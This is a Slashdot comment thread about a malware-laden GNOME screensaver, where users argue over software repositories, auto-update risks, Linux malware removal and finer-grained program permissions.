No one is being locked into the repositories. If they want they can go elsewhere to get their software. The repositories merely provide a reasonably safe set of software available for the user.

Re:Repositories! (0)

Anonymous Coward | more than 4 years ago | (#30382688)

Yes, for typical users absolutely...
People should have to jump through hoops to install arbitrary untrusted software, so that only technically competent people will ever try to do so.

Re:Repositories! (1)

selven (1556643) | more than 4 years ago | (#30382708)

You can always download software from elsewhere. Also, the Ubuntu repositories really aren't like the iPhone App Store - the approval process isn't nearly as evil, for one.

Okay (0)

Anonymous Coward | more than 4 years ago | (#30382354)

So a user runs untrusted software as root and gets malware. Never heard of this happening.

auto-update (3, Insightful)

TheSHAD0W (258774) | more than 4 years ago | (#30382404)

Okay, this scares me.

1. What happens when a publisher includes auto-updating code, but not specific attack code, like the DDoS software in the mentioned examples? If discovered it will appear to be a security risk, but not specifically malicious...

2. What happens when a software developer produces some completely innocuous software, gets into the repositories - and then months down the road, produces an update with DDoS capability, and has the update pushed into the repositories and automatically distributed?

Re:auto-update (1, Offtopic)

Aim Here (765712) | more than 4 years ago | (#30382518)

You're describing Microsoft Windows XP.

XP came with an automatic update function. A few years into XP's life, Windows Genuine Advantage was automatically rolled out in a service pack, and once installed it will degrade your computer if Microsoft decides you might be a pirate.

Your nightmare scenario is everyday reality for most people. Pleasant dreams.

scare the crap out of me (1)

qbasicjedi (1247790) | more than 4 years ago | (#30382428)

I swear to god, not thirty seconds before I came to slashdot and saw this story, I closed the gnome-look.com tab and had just finished pimpin' out my Gnome desktop. Good thing I didn't download any screensavers...

Whoop dee doo (1)

Dega704 (1454673) | more than 4 years ago | (#30382436)

Like windows or any operating system linux is only as secure as the user keeps it. In a way this is sort of a win because it means linux is now popular enough for the malware makers to pay attention to it, and it will motivate the linux community to be more vigilant. Welcome to the mainstream and everything that comes with it. This highlights the advantage of using software repositories as well............

At least it was fixable. (2, Insightful)

supersloshy (1273442) | more than 4 years ago | (#30382450)

Before trolls start yelling about how "OMGZ LINUX ISN'T SECURE HAHAHA" and things like that, let me tell you something: because GNU/Linux is so open and configurable, malware like this can be very easily removed. All you have to do is run a few commands in a terminal to remove this. On Windows and the like, things are so complicated that Anti-virus software is almost required to remove some of their malware. I am glad to use an OS that doesn't restrict me like that. :)

Re:At least it was fixable. (5, Insightful)

PeanutButterBreath (1224570) | more than 4 years ago | (#30382600)

Before trolls start yelling about how "OMGZ LINUX ISN'T SECURE HAHAHA" and things like that, let me tell you something: because GNU/Linux is so open and configurable, malware like this can be very easily removed. All you have to do is run a few commands in a terminal to remove this.

Before trolls start yelling about how "OMGZ WINDOZE AV SOFTWARE IS COMPLICATED HAHAHA" and things like that, let me tell you something: because Windows is so accessible, AV software like this can be very easily deployed. All you have to do is click a few icons in the Start Menu to remove this. Blah, blah, blah

On Linux and the like, everything is simple if you already know what you want to do. Otherwise, you have to trust unaccountable internet entities to provide you abstruse commands to run and hope they aren't trying to trick you into doing even more damage to your system. It should be obvious why that is a no way to combat malware.

What the summary didn't mention... (5, Informative)

AlgorithMan (937244) | more than 4 years ago | (#30382502)

What the summary didn't mention: the screensaver has been there less than 24 hours.
see pro-linux.de [pro-linux.de] (german)

Patch news... (2, Funny)

ghostis (165022) | more than 4 years ago | (#30382516)

The Gnome team is working with several university neurology departments to develop a patch for human nature that fixes this problem. It will be included in Gnome 4.

old chinese proverb (0)

Anonymous Coward | more than 4 years ago | (#30382536)

You can't patch stupid!

O/S Permissions Model Broken - try plash (1)

_greg (130136) | more than 4 years ago | (#30382658)

The idea that software that I have no opportunity to audit runs with my privileges when I run it is fundamentally broken. There is no way to clean malware that had a network connection long enough to hide a trojan anywhere and then overwrite itself to appear relatively innocuous. While a complete redesign of the way permissions and permission-delegation would be ideal, it is not practical in the short term. Using systems like http://plash.beasts.org/ [beasts.org] can help.

Fine-grained privileges (1)

noidentity (188756) | more than 4 years ago | (#30382616)

I want a mainstream OS that allows fine-grained privileges for programs. Why should I have to give my screensaver permission to do anything except display graphics, and perhaps read some data files from its own directory?

Why can't we call it what it is... (1)

mysidia (191772) | more than 4 years ago | (#30382724)

It's a Trojan Horse

Malware is a generic term for malicious software.

But the notion of Trojan applies here; you download a seemingly innocent program, but it contains a hidden nefarious payload.

AV software makers love it, because it means that once software gets classified as Malware instead of an actual virus, they don't have to worry about detection and safe removal anymore, that's another program's job...

Load More Comments
Slashdot Account

Need an Account?

Forgot your password?

Don't worry, we never post anything without your permission.

Submission Text Formatting Tips

We support a small subset of HTML, namely these tags:

  • b
  • i
  • p
  • br
  • a
  • ol
  • ul
  • li
  • dl
  • dt
  • dd
  • em
  • strong
  • tt
  • blockquote
  • div
  • quote
  • ecode

"ecode" can be used for code snippets, for example:

<ecode>    while(1) { do_something(); } </ecode>
Create a Slashdot Account

Loading...